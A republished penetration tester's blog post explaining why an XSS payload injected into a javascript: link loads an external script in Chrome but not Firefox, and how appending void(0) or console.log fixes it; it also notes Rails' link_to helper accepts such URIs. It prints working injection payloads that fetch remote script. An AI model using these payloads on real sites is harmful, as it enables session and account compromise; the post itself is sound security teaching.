综合编程

I was recently contacted by to help him with an XSS issue he was having problems with. Ryan…

微信扫一扫,分享到朋友圈

I was recently contacted by to help him with an XSS issue he was having problems with. Ryan…
0

An odd quirk with XSS through JavaScript URI

Fri 14th June 19

I was recently contacted by Ryan Dewhurst
to help him with an XSS issue he was having problems with. Ryan knows his stuff, and if he was having problems with something, I knew it had to be a fun challenge.

He could inject content into a JavaScript URI and was trying to find a way to fully exploit it. The injection looked like this:

<a href="javascript: <INJECT HERE>">Click Me</a>

XSS could easily be proved by injecting an alert which triggered when the link was clicked:

<a href="javascript: alert(1)">Click Me</a>

But when he tried to inject the following, fairly standard code, to add a new script tag to the DOM, he came across some issues.

var s = document.createElement('script');
s.type = 'text/javascript';
s.src = 'https://vuln-demo.com/jsquirk/xss.js';
document.head.appendChild(s);

The code worked fine on his test site (you all test your exploits locally before dropping them on a client site right?), the external JS file was loaded and the code ran successfully, but when it was dropped into the client environment, rather than the external file being loaded, the page refreshed and showed the following content:

[object HTMLScriptElement]

I didn’t have access to the client site but was able to confirm that the sample code worked correctly for me and we both sat and scratched our heads. I was in the middle of writing a report so the test I’d done was in Chrome which I use as my main browser, to help with debugging, I brought up my testing environment of Firefox, Burp and a few other bits and then tried again with the test code. At this point the test code failed and I got the same response as Ryan was getting from the client site. I asked Ryan what browser he was using, he said Firefox to access the client but, same as me, had looked at the sample code in Chrome. When he tried running the exploit against the client site in Chrome, it worked as expected, the JS was loaded and ran fine.

After a bit of debugging, we found that by adding an alert or a console.log on to the end of the exploit code, it could be made to work in both Firefox and Chrome:

var s = document.createElement('script');
s.type = 'text/javascript';
s.src = 'https://vuln-demo.com/jsquirk/xss.js';
document.head.appendChild(s);
console.log("");

After some reading around I found that if you are using an onclick event on a link, and want to disable the link itself, you can use javascript: void(0)
as a way to kill it. Swapping that in for the log command in this example worked and had the additional benefit of not writing anything extra to the console.

Based on the brief reading I did on the topic, the browser reaction should be based on what is returned by the last command ran. void(0)
, console.log("")
and alert(1)
all return undefined
which tells the browser not to react to the link, document.head.appendChild()
returns the element which was added to the DOM, which is not undefined
. Based on this, I’d guess that Firefox is behaving correctly in processing the href after the JavaScript has been executed while Chrome is being nice and assuming that as you ran some JavaScript you probably won’t then want to follow the link.

Out of curiosity, I also tried the test code in Edge and IE. I initially got some mixed results with both showing signs of working with and without the trailing command but after clearing caches and starting from a clean slate, both appear to work in the same way as Firefox and require the trailing command.

If you want to check this out, I’ve setup two demonstrations on JSFiddle:

Before anyone jumps in shouting "I’d have exploited it a different way", or, "This way is better…", when this failed, both Ryan and myself wanted to know why. Yes, there are lots of other ways this could have been exploited, but learning why something is failing is a really useful task and practising debugging things like this when they come up helps improve those core skills.

An additional note from Ryan, he says this is a common issue in Rails apps. As Rails output encodes most content by default, developers don’t think that JavaScript (and "data") URIs are a problem but
this is one of the few places Rails does not auto-encode, so any un-validated input passed to the "link_to" helper is vulnerable to "javascript" and "data" URI XSS.

Conclusion

As well as pointing out this specific quirk, I want this post to highlight the different behaviours between browsers, all of which are supposed to implement the same standard. If you are developing a proof of concept, make sure you test it out in as many different environments as possible and comment on the findings in your report. You don’t want to spend ages putting together an amazing demo of an exploit only to find that while it worked perfectly for you in Chrome, it didn’t work for the client when they looked at it in Edge.

Similarly, you might feel that a vulnerability deserves its risk level changing if browser support is not universal; a vulnerability which can only be exploited in Firefox may not be a serious risk to a client who has enforced rules on staff only using IE.

Finally, if something doesn’t work for you the first time, or doesn’t work quite as you would expect, if you have the time, look into why. Spend some time debugging it and trying to understand the problem as those few minutes spent today may save you hours on a future test.

阅读原文...


微信扫一扫,分享到朋友圈

I was recently contacted by to help him with an XSS issue he was having problems with. Ryan…
0

Avatar

飞机零部件企业ASCO遭遇勒索病毒,工业互联网成网络攻击重灾区

上一篇

条码支付技术体系介绍

下一篇

评论已经被关闭。

插入图片

热门分类

往期推荐

I was recently contacted by to help him with an XSS issue he was having problems with. Ryan…

长按储存图像,分享给朋友